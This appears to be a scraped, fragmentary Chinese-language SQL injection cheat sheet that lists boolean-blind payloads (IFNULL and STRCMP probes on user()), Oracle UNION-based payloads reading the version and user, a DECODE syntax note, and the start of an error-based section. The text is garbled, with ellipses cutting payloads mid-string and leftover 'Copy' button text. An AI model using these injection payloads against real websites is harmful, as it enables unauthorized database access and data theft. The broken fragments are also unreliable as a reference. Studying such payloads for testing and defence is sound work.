id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +
#如果 IFNULL 第一个参数的表达式为 NULL,则返回第二个参数的备用值,不为...id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +
#若所有的字符串均相同,STRCMP() 返回 0,若根据当前分类次序,第一个参数小于第二个...id=-1' union select user,null from dual--
?id=-1' union select version,null from v$instance--
?...语法:decode(条件,值1,返回值1,值2,返回值2,…值n,返回值n,缺省值);
该函数的含义如下:
CopyIF 条件=值1 THEN
RETURN(返回值1)
ELSIF 条件=值2...users)),null--
3.2 报错注入
Copy?